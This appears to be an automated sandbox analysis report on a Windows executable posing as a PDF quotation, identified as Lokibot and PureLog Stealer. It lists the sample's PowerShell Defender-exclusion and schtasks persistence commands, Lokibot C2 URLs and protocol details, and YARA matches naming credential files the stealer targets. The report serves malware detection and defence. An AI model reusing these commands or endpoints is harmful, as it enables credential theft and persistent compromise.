Edit tour

Windows Analysis Report
Quotation2025-0107pdf.exe

Overview

General Information

Sample name:	Quotation2025-0107pdf.exe
Analysis ID:	1585262
MD5:	ff0a37e1048052c58526a9c38efc1954
SHA1:	cdb18e6094372c6ab8280723bb9c64b9ba8269da
SHA256:	9e39a3fc8fca2cc19c64e0c75e88f897a7d07f43d3430596fecdccae2b36d680
Tags:	exeLokiuser-abuse_ch
Infos:

Detection

Lokibot, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Lokibot

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Quotation2025-0107pdf.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\Quotation2025-0107pdf.exe" MD5: FF0A37E1048052C58526A9C38EFC1954)

powershell.exe (PID: 7524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7924 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7604 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Quotation2025-0107pdf.exe (PID: 7772 cmdline: "C:\Users\user\Desktop\Quotation2025-0107pdf.exe" MD5: FF0A37E1048052C58526A9C38EFC1954)

mexnJkivovwH.exe (PID: 7908 cmdline: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe MD5: FF0A37E1048052C58526A9C38EFC1954)

schtasks.exe (PID: 8080 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp36D0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mexnJkivovwH.exe (PID: 8124 cmdline: "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe" MD5: FF0A37E1048052C58526A9C38EFC1954)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://0xmrmagnezi.github.io/malware%20analysis/LokiBot/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17ad8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4ea3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x136e7:$des3: 68 03 66 00 00 0x17ad8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17ba4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1720797556.0000000009A00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1714510226.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1ac04:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x7fb7:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x167fb:$des3: 68 03 66 00 00 0x1ac04:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1acd0:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17980:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4d4b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1358f:$des3: 68 03 66 00 00 0x17980:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17a4c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000009.00000002.1751386297.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.2909417745.0000000000A92000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000009.00000002.1751386297.0000000003CEA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x29dcc:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x1717f:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x259c3:$des3: 68 03 66 00 00 0x29dcc:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x29e98:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1b8468:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x1a5833:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1b4077:$des3: 68 03 66 00 00 0x1b8468:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1b8534:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x2a9ab8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x296e83:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x2a56c7:$des3: 68 03 66 00 00 0x2a9ab8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x2a9b84:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: Quotation2025-0107pdf.exe PID: 7332	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Quotation2025-0107pdf.exe PID: 7332	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Quotation2025-0107pdf.exe PID: 7332	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Quotation2025-0107pdf.exe PID: 7332	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x84e7:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0xcc73:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0xdfc11:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: Quotation2025-0107pdf.exe PID: 7772	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: mexnJkivovwH.exe PID: 7908	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: mexnJkivovwH.exe PID: 7908	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: mexnJkivovwH.exe PID: 7908	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: mexnJkivovwH.exe PID: 7908	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x2fd1b:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x34622:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x7896b:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: mexnJkivovwH.exe PID: 8124	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: mexnJkivovwH.exe PID: 8124	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: mexnJkivovwH.exe PID: 8124	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x30f1:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 57 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.mexnJkivovwH.exe.3cca880.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Quotation2025-0107pdf.exe.4b08eb0.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Quotation2025-0107pdf.exe.9a00000.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.mexnJkivovwH.exe.3cea8a0.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Quotation2025-0107pdf.exe.4ae8e90.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.mexnJkivovwH.exe.3cea8a0.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Quotation2025-0107pdf.exe.4ae8e90.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Quotation2025-0107pdf.exe.9a00000.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.mexnJkivovwH.exe.3cca880.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
9.2.mexnJkivovwH.exe.3ebf078.2.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.mexnJkivovwH.exe.3ebf078.2.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.mexnJkivovwH.exe.3ebf078.2.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.mexnJkivovwH.exe.3ebf078.2.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
9.2.mexnJkivovwH.exe.3ebf078.2.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.mexnJkivovwH.exe.3c45590.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.mexnJkivovwH.exe.3c45590.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.mexnJkivovwH.exe.3c45590.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.mexnJkivovwH.exe.3c45590.0.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
9.2.mexnJkivovwH.exe.3c45590.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
